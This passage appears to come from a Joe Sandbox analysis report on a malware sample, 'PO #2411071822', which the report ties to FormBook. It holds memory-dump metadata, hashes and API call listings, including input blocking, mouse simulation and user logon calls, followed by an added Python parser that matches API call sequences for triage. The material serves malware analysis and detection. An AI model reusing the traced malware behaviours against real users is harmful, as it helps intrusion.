                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d20af1f74676f3287ef03ffa24f9ac5ab079f6e10a696da1a579eb72e1d17159
                                                                                                              • Instruction ID: af081db480512505c724a0f5ff593570e452ba82bf78567d23da938d8614baaf
                                                                                                              • Opcode Fuzzy Hash: d20af1f74676f3287ef03ffa24f9ac5ab079f6e10a696da1a579eb72e1d17159
                                                                                                              • Instruction Fuzzy Hash: BA323662D29F014DD7279634CA22336A288EFB73C5F15D737E819B5AA6EB39C4C34105
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __itow__swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 674341424-0
                                                                                                              • Opcode ID: a77acbc62a55a8c5662c2645a46591ec4308bf0369c4770c10eed0b713d8aa72
                                                                                                              • Instruction ID: fbaac211f22a3d16a610a36513f4afc3a03939842f1fc87403b20f55b65ee099
                                                                                                              • Opcode Fuzzy Hash: a77acbc62a55a8c5662c2645a46591ec4308bf0369c4770c10eed0b713d8aa72
                                                                                                              • Instruction Fuzzy Hash: E622DE716083519FC726DF15C880B6FB7E4BF84304F104A2EF99A9B292DB74E944CB82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61ce71ffdf9bd3530fd53cdfd09480b5795d03b966fea264cf235c8ca35ca4e0
                                                                                                              • Instruction ID: 1fa225afbfd43ff9a2f394862e2990f56bbf73b72fe14dc79102e97276190621
                                                                                                              • Opcode Fuzzy Hash: 61ce71ffdf9bd3530fd53cdfd09480b5795d03b966fea264cf235c8ca35ca4e0
                                                                                                              • Instruction Fuzzy Hash: 23B1D120D2AF814DD22396398931336B65CBFBB2D5B91D72BFC1A74D62EB6185C34184
                                                                                                              APIs
                                                                                                              • __time64.LIBCMT ref: 0042B6DF
                                                                                                                • Part of subcall function 0040344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0042BDC3,00000000,?,?,?,?,0042BF70,00000000,?), ref: 00403453
                                                                                                                • Part of subcall function 0040344A: __aulldiv.LIBCMT ref: 00403473
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                                                              • String ID:
                                                                                                              • API String ID: 2893107130-0
                                                                                                              • Opcode ID: cf54343021d57a9eb885cbad13b2036cf807b57da1091aa16c89737bcc65a415
                                                                                                              • Instruction ID: bf3cd4ca5a7c47aaeea5da6201342981618fc90b45545d053036b3914f4a26de
                                                                                                              • Opcode Fuzzy Hash: cf54343021d57a9eb885cbad13b2036cf807b57da1091aa16c89737bcc65a415
                                                                                                              • Instruction Fuzzy Hash: 4E21A2726345108BCB29CF28D881A52F7E1EB95311B648E7DE4E5CB2C0DB78B905CB98
                                                                                                              APIs
                                                                                                              • BlockInput.USER32(00000001), ref: 00436ACA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BlockInput
                                                                                                              • String ID:
                                                                                                              • API String ID: 3456056419-0
                                                                                                              • Opcode ID: 4e8c13f12478a1647774e02d51131c97bc427f3ee50a4146d38409811e1c91b3
                                                                                                              • Instruction ID: a3c71020c349c1bad69d8f688e5429dae7f88e473a72156b5badf49aded9d405
                                                                                                              • Opcode Fuzzy Hash: 4e8c13f12478a1647774e02d51131c97bc427f3ee50a4146d38409811e1c91b3
                                                                                                              • Instruction Fuzzy Hash: 79E01235600215AFC700EB59D404996B7ECAFA9751F05C426EA45D7291DAB4E8048B91
                                                                                                              APIs
                                                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0042750A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: mouse_event
                                                                                                              • String ID:
                                                                                                              • API String ID: 2434400541-0
                                                                                                              • Opcode ID: 12d1cd7d8b33ec44b32c836e1b62e305401c0c902bd659b76f0bb3bdae1dff53
                                                                                                              • Instruction ID: 7786ed5e35b77a74bb11637da0d38a6a3c3c4e0bccfa136a3bc787f23cc90090
                                                                                                              • Opcode Fuzzy Hash: 12d1cd7d8b33ec44b32c836e1b62e305401c0c902bd659b76f0bb3bdae1dff53
                                                                                                              • Instruction Fuzzy Hash: BED09EA476C62579ED191B24BC1BFB75508F304781FD4455BB603D95C1B8DC6D42A03E
                                                                                                              APIs
                                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0041AD3E), ref: 0041B124
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LogonUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 1244722697-0
                                                                                                              • Opcode ID: dde723793bde01ca028171319d9a77aba62717d56036030641312d19aeaf4509
                                                                                                              • Instruction ID: f508b25f6d8f824f93e5550273012868950fb8e10e67fe3f519052699571168a
                                                                                                              • Opcode Fuzzy Hash: dde723793bde01ca028171319d9a77aba62717d56036030641312d19aeaf4509
                                                                                                              • Instruction Fuzzy Hash: 7DD05E321A464EAEDF024FA4DC02EAE3F6AEB04700F408110FA11D50A0C671D531AB50
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 1b1c6bee29a17e27ad68f2f48c937a27e74e5891e4f072b78a9cb43e531c143e
• Instruction ID: 3d9aab2fb18e96d69c9f2b447a37dcde103bc0f559736778317b1466a32513fb
• Opcode Fuzzy Hash: 1b1c6bee29a17e27ad68f2f48c937a27e74e5891e4f072b78a9cb43e531c143e
• Instruction Fuzzy Hash: B7C04CB1800109DFC751CFC0CD449EEB7BCAB08305F1041A2D105F2110D7749B459B77
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0040818F
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: b7ed5b710019607225bf0e46d923db04d22158f2927e222b655701c00f7b11d6
• Instruction ID: 2325d13f12b1329e2e2206243354ab9972ae11181e242e6684eb488505eaba7b
• Opcode Fuzzy Hash: b7ed5b710019607225bf0e46d923db04d22158f2927e222b655701c00f7b11d6
• Instruction Fuzzy Hash: 59A0113080020CAB8F002B82EC088883F2CEA002A0B000030F80C00220ABA2A8A08A8A
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 137a506aa6261d28fe45dc173f65acd9f9bce2567332e4f6ce9c9b702709cc8d
• Instruction ID: 9fbe75ac46f4fe231103ad7b16bd15abe487fc5c2a15a9e95638a454ca0aefd4
• Opcode Fuzzy Hash: 137a506aa6261d28fe45dc173f65acd9f9bce2567332e4f6ce9c9b702709cc8d
• Instruction Fuzzy Hash: B612B070A00219DFDF05DFA6DA81AEEB7F5FF49300F10462AE806E7291EB35A914CB54
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1be80c88cf7e3b2dd9a37d7e8e799322830f90cd6c30f58ca1c77ffcd9bdd653
• Instruction ID: 4b7e0ca9804a27df8a6b648aa9beda40ebae516bf9878953786c7566b3e81c89
• Opcode Fuzzy Hash: 1be80c88cf7e3b2dd9a37d7e8e799322830f90cd6c30f58ca1c77ffcd9bdd653
• Instruction Fuzzy Hash: 3D12D170900269CFDB26DF56D480ABEB7B0FF14304F15827AD94AAB391E335AD85CB91
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
• Opcode ID: bdf05207529117623dd211bfc61464ba760ce02bf2c1bd672950ba0fcb0ca333
• Instruction ID: 9ad3f66851a285823cd20b952df222569122de7a0bbebc6d2a28c16ab37e208e
• Opcode Fuzzy Hash: bdf05207529117623dd211bfc61464ba760ce02bf2c1bd672950ba0fcb0ca333
• Instruction Fuzzy Hash: 0D02D070A00119DFCF06DF65DA81AAEB7B5FF45300F10806AE806EB296EB74DE15CB95
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: 9a6c9845372738672ea76e8050e728b7d1301144bb6edd8ee7b97411a6a1957d
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: C0C1B1322051970EDB2E863A843453FBAA15EA27B171A077ED8B2DB5D1EF34C534D624
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction ID: 43dd0b3b2cde5f5783abcf00efd0afc39208b22024b542f35179fa9d1cbbe962
• Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction Fuzzy Hash: 7CC1C1322051970EDF2E463A843463FBAA15EA2BB171B077ED8B2DB5D5EF24C534D620
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 47487fc2a0713659bb92456050163555af821ff8c207127eee29fdbf160ab0c7
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: 6EC16F3220909B0DDF2E463A847443EBAA15EA2BB531B177DEDB2CB5D5EE20C574D620
APIs
• DeleteObject.GDI32(00000000), ref: 0043A2FE
• DeleteObject.GDI32(00000000), ref: 0043A310
• DestroyWindow.USER32 ref: 0043A31E
• GetDesktopWindow.USER32 ref: 0043A338
• GetWindowRect.USER32(00000000), ref: 0043A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0043A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0043A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A4D8
• GetClientRect.USER32(00000000,?), ref: 0043A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0043A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A55E
• GlobalLock.KERNEL32(00000000), ref: 0043A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A576
• GlobalUnlock.KERNEL32(00000000), ref: 0043A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A586
• GlobalFree.KERNEL32(00000000), ref: 0043A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0046D9BC,00000000), ref: 0043A5B9
• GlobalFree.KERNEL32(00000000), ref: 0043A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0043A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0043A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A630
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A81D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: 1ead1d624081e75ad4b68c92d96105f46f65b5566c50e9711399bd7af7709deb
• Instruction ID: e2292e154dbfa130ff9589bf625a57393f037d0141d9f63002f00fa88ae03212
• Opcode Fuzzy Hash: 1ead1d624081e75ad4b68c92d96105f46f65b5566c50e9711399bd7af7709deb
• Instruction Fuzzy Hash: 12029B75A00214EFDB14DFA5CD89EAE7BB9FB49310F008129F905AB2A0D774ED41CB69
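The function listed above is the AutoIt runtime's picture-loading routine rather than the FormBook payload: it opens a file read-only (CreateFileW with access 80000000, GENERIC_READ), copies it into a moveable global block, wraps that block in an IStream, decodes it with OleLoadPicture and pushes the bitmap into a "static" control with SendMessageW message 00000172 (STM_SETIMAGE). When triaging many of these listings it helps to parse the "APIs" bullets mechanically and test for such an ordered call sequence. The parser and matcher below are an added example written for this page, not Joe Sandbox code and not part of the sample; the sample trace is built from lines of the listings on this page (the final subcall line is taken from the next function), the line format is assumed from what is printed here, and the PICTURE_FROM_FILE pattern is the author's own summary of the routine.

```python
"""Parse Joe Sandbox "APIs" bullets and look for an ordered API sequence.

Added example for this report page; not Joe Sandbox tooling and not code
from the analysed sample.  The line format is inferred from the listings
on the page, and the call pattern below is an assumption about what a
"load a picture from a file into a static control" routine looks like.
"""
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" bullet, e.g.
#   • ReadFile.KERNEL32(00000000,00000000,...), ref: 0043A576
#   • DestroyWindow.USER32 ref: 0043A31E
#   • Part of subcall function 0044D575: GetSysColor.USER32(00000012), ref: 0044D5AE
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<dll>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str                # name as printed, e.g. CreateFileW
    dll: str                # module, upper-cased
    args: tuple             # raw argument tokens as printed ("?" = unresolved)
    ref: int                # address of the call site
    caller: Optional[int]   # set when the report attributes the call to a subcall


def canonical(api: str) -> str:
    """Drop the Ex / A / W suffixes so CreateWindowExW compares equal to CreateWindow.
    Heuristic: only an upper-case trailing A or W is treated as a charset suffix."""
    return re.sub(r"(?:Ex)?[AW]?$", "", api)


def parse_api_lines(text: str) -> list:
    """Return the API bullets of a listing as ApiCall records, in listing order.
    Non-API bullets (hashes, dump sources, IDs) do not match and are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args else ()
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        calls.append(ApiCall(m.group("api"), m.group("dll").upper(), args,
                             int(m.group("ref"), 16), caller))
    return calls


def find_sequence(calls, pattern):
    """Call-site addresses at which `pattern` (canonical API names) occurs as an
    ordered, not necessarily contiguous, subsequence of the function's own calls;
    None if absent.  Subcall lines are ignored so a hit reflects this function."""
    hits = []
    own = iter(c for c in calls if c.caller is None)
    for want in pattern:
        for c in own:               # shared iterator: order is enforced
            if canonical(c.api) == want:
                hits.append(c.ref)
                break
        else:
            return None
    return hits


def dll_histogram(calls) -> dict:
    """How many calls each module receives; a quick profile of a function."""
    hist = {}
    for c in calls:
        hist[c.dll] = hist.get(c.dll, 0) + 1
    return hist


# Assumed pattern: file -> HGLOBAL -> IStream -> OleLoadPicture -> STM_SETIMAGE.
PICTURE_FROM_FILE = ("CreateFile", "GetFileSize", "GlobalAlloc", "ReadFile",
                     "CreateStreamOnHGlobal", "OleLoadPicture", "SendMessage")

# Constructed from lines of the listings on this page (last line is a subcall
# bullet of the following function, included to exercise that form).
SAMPLE_TRACE = """\
• DestroyWindow.USER32 ref: 0043A31E
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A4D8
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A55E
• GlobalLock.KERNEL32(00000000), ref: 0043A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A576
• GlobalUnlock.KERNEL32(00000000), ref: 0043A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A586
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0046D9BC,00000000), ref: 0043A5B9
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0043A60E
  • Part of subcall function 0044D575: GetSysColor.USER32(00000012), ref: 0044D5AE
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_TRACE)
    print(dll_histogram(calls))
    hits = find_sequence(calls, PICTURE_FROM_FILE)
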